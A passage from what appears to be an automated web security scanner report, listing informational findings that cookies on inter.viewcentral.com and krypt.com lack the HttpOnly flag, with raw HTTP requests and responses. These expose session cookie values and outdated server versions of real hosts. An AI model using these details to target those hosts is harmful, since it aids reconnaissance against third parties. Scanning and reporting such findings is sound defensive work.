Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 1602
Content-Type: image/png
Last-Modified: Wed, 28 Apr 2010 20:38:28 GMT
Accept-Ranges: bytes
ETag: "2da6fcc112e7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............L"......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.OTW.>..0 .!.".V1-i....;V.....M..M..Fw.;M...4]...I.....)t.h..Xa$.B....a~.y......ufx..f.......s...;.9....4......Y..9#G.
...[SNIP]...

18.317. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cbt.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cbt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4679
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:17 GMT
Accept-Ranges: bytes
ETag: "ba58a1ac38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx....o\.}..s...3...3.R.e..-+Fe7Hb').6E.@.C..u...0...!h..    .....@..M.".[..5]..V......DI.)q........p(.6c.r..#..~.9..m..!|*.....|*.."...../..........7.7.Ro....O<.
...[SNIP]...

18.318. https://inter.viewcentral.com/events/uploads/arcsight/cellBg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cellBg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cellBg.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 266
Content-Type: image/gif
Last-Modified: Mon, 10 May 2010 23:50:48 GMT
Accept-Ranges: bytes
ETag: "e9b7c9d9bf0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

GIF89a..6...............................................................................................................................................................................................
...[SNIP]...

18.319. https://inter.viewcentral.com/events/uploads/arcsight/cellBg2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cellBg2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/cellBg2.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 264
Content-Type: image/gif
Last-Modified: Thu, 22 Apr 2010 16:27:29 GMT
Accept-Ranges: bytes
ETag: "28c2b7b338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

GIF89a..(...............................................................................................................................................................................................
...[SNIP]...

18.320. https://inter.viewcentral.com/events/uploads/arcsight/esm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/esm.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/esm.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 715
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:05:00 GMT
Accept-Ranges: bytes
ETag: "e7d51b5a7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<...mIDATx..W... ..P.`K.JpJ...d..+..!)!)!V*X.......p........;.(!.?.7..?N......U/X.U...*.........6.6d...U'.E....g.'.$.....(G.F.Ga.j.
...[SNIP]...

18.321. https://inter.viewcentral.com/events/uploads/arcsight/greybar.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/greybar.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/greybar.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 359
Content-Type: image/png
Last-Modified: Thu, 08 Apr 2010 17:50:40 GMT
Accept-Ranges: bytes
ETag: "b64d95044d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............b......    pHYs..........+......tIME.....2./n.a....tEXtAuthor....H....tEXtDescription..    !#...
tEXtCopyright....:....tEXtCreation time.5..    ...    tEXtSoftware.]p.:....tEXtDisclai
...[SNIP]...

18.322. https://inter.viewcentral.com/events/uploads/arcsight/icon_new.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/icon_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/icon_new.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 2031
Content-Type: image/png
Last-Modified: Thu, 06 Jan 2011 01:20:31 GMT
Accept-Ranges: bytes
ETag: "4467c6e83fadcb1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR...6..........+......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

18.323. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/ilt.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/ilt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 5786
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:56 GMT
Accept-Ranges: bytes
ETag: "fce4b7c338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#...aIDATx...[........]U}......3....D.^JYH.5l....x.v.H....N.<..$y.K. A^d./..'/I@X..z.u......6)..I.9W...vO......9'.]U..3.H......vsX.:.W..;.....W.+..}.F>.x....z..e2....,
...[SNIP]...

18.324. https://inter.viewcentral.com/events/uploads/arcsight/logger.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/logger.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/logger.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 826
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:05:12 GMT
Accept-Ranges: bytes
ETag: "342425bca7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.r.0.U.-..1.<.2....]|'...O.?...k..}..v..l..-Z;V.{.=..h.w.D4    >......l2.z.b...f...!.9.Q*H    ..~...Q........r.Q..".....^...
...[SNIP]...

18.325. https://inter.viewcentral.com/events/uploads/arcsight/red.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/red.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/red.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 3802
Content-Type: image/png
Last-Modified: Thu, 22 Apr 2010 16:28:31 GMT
Accept-Ranges: bytes
ETag: "429ab3d838e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:38 GMT

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

18.326. https://inter.viewcentral.com/events/uploads/arcsight/topbgfill.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/topbgfill.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/topbgfill.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 181
Content-Type: image/gif
Last-Modified: Thu, 22 Apr 2010 16:28:39 GMT
Accept-Ranges: bytes
ETag: "76a486dd38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

GIF89a..K....................................................................................................!.......,......K...2.&.bQ4AX.e..r.Y]Ox.WTO    ......1.....H.
..B.$"X.c...;

18.327. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/vlt.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/vlt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4135
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:29:07 GMT
Accept-Ranges: bytes
ETag: "905d3eee38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx.......u..{oU.{.......p(>dK4hQ..v..~"..]. .'{#.,.7dc..B.[...<.....#K.EJ6..lqf(.Cq....p.....{o.U=.|...=......~U.....{...O....>.O.........2.E....ZJ..\9}........
...[SNIP]...

18.328. https://inter.viewcentral.com/events/uploads/arcsight/wbt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/wbt.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/wbt.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4506
Content-Type: image/png
Last-Modified: Thu, 22 Apr 2010 16:29:17 GMT
Accept-Ranges: bytes
ETag: "1438e3f338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#...aIDATx....o..}.?...}...]$EJ...c$.....r.<$...HP4@..T.....}H...(
..m.....H.8u-5Ic.....u.EQ...%w....\.9}...J..DK.z.....p..9...~..;s..o.h...2..w.}7...2.tZ..u..m...s..B.
...[SNIP]...

18.329. https://inter.viewcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 13736
Content-Type: image/x-icon
Last-Modified: Wed, 15 Feb 2006 18:12:59 GMT
Accept-Ranges: bytes
ETag: "f480e6735b32c61:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:28:26 GMT

8BPS............................-.8BIM................8BIM.%......F...&.V........w8BIM.$......<?xpacket begin='...' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='XMP too
...[SNIP]...

18.330. https://inter.viewcentral.com/reg/arcsight/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /reg/arcsight/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg/arcsight/home HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Redirect
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 190
Content-Type: text/html
Location: http://inter.viewcentral.com/events/redir/redir.aspx?/arcsight/home
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:28:10 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://inter.viewcentral.com/events/redir/redir.aspx?/arcsight/home">here</a></body>

18.331. http://kroogy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:25:28 GMT; path=/
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 28083

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Kroogy Search - Home</title>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

18.332. http://krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:32 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=b90b5be3ebc9fd9d15f94d51bc1066e1; expires=Tue, 24-May-2011 16:34:32 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27975

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...

18.333. http://krypt.com/active/cart/add.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /active/cart/add.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/add.html?package=65 HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:37:50 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:37:53 GMT; path=/; domain=.krypt.com
Content-Length: 7
Content-Type: text/html

SUCCESS

18.334. http://krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
